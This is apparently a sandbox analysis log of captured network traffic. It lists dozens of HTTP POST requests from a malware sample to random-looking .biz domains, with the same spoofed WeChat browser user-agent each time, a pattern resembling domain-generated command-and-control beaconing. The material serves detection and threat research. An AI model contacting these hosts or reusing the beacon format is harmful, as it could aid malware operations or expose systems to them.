Source: global traffic	HTTP traffic detected: POST /levm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /opxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /aldycdkjcqrlqwgv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kuspgbuc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ixcw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yvoikxldsfcfgso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ugrdtwtacn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /exeqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dknfakeq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mmqkhapthxjsnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ndtogcedgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hkulo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sdsuahsrg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /otgkntfmpmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /umcybsxuaomkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ilidqggw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /digagk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iiuonvofxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nroqcaxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nuoraorjkrhft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /krrofgdqsat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /smeisoexdoewo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhsygfwinibyek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tdfnnvngg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ydwthbku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jmryxuilbmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vbgexw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /flarmrvjgo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iatkorfmnwf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cmvqnkktnlmsiyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vkwyeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tflprvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ybbogla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cgoaec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vatx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cuqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kiywguufjdpqtpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ehquov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vppkcegilvgf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fkax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gqqjufjjpxhxqwb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /obdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pirbxlgko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xvbdrvgarw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rxnqqlqsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wxnfkxfh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cjwsbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qcbsfnonovikje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lrywafs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hbcdkqyacacfvqqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hnpfnrirpigau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /goxnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xmoomdas HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qmcamdw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /akpcxuoptmorf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /armgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vdcxryneefpufnys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
